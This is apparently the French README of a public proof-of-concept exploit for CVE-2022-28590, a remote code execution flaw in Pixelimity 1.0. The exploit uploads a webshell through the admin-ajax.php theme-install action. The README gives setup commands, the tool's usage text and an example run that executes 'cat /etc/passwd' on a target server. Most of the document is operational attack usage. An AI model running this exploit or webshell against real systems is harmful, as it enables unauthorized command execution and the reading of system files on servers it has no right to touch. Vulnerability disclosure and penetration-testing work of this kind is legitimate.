
Preuve de concept de l'exploit pour CVE-2022-28590, une vulnérabilité d'exécution de code à distance dans Pixelimity 1.0. Téléverse un webshell via admin-ajax.php pour une exécution de commandes authentifiée.
La découverte originale et le PoC manuel proviennent de tuando243 :
Une vulnérabilité d'exécution de code à distance (RCE) existe dans Pixelimity 1.0 via admin/admin-ajax.php?action=install_theme.
Ce PoC télécharge un webshell simple pour une exécution de code à distance ultérieure. Cet exploit suppose que la fonction system() est autorisée sur le serveur, sinon une reconnaissance préalable doit être effectuée pour détecter quelle fonction permet l'exécution autre que system.
git clone https://github.com/jcarabantes/CVE-2022-28590.git
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2022-28590.py -h
python CVE-2022-28590.py -h
___ _ _ ____ ___ ___ ___ ___ ___ ___ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ ( _ )| __)/ _ \ / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ / _/(___)/ _/ / _ \|__ \_ /( (_) )
\___) \/ (____) (____)\___/(____)(____) (____)\___/(___/ (_/ \___/
Vulnerability discovered by tuando243
PoC author: @javicarabantes
usage: CVE-2022-28590.py [-h] [-d] [-q] --url URL --user USER [--password PASSWORD] [-c COMMAND]
optional arguments:
-h, --help show this help message and exit
-d Debug output
-q Do not print the banner
--url URL url: https://server:8081/
--user USER admin user
--password PASSWORD admin password
-c COMMAND Command to execute. Default: id
python CVE-2022-28590.py --url http://localhost:8082 --user myuser -c "cat /etc/passwd"
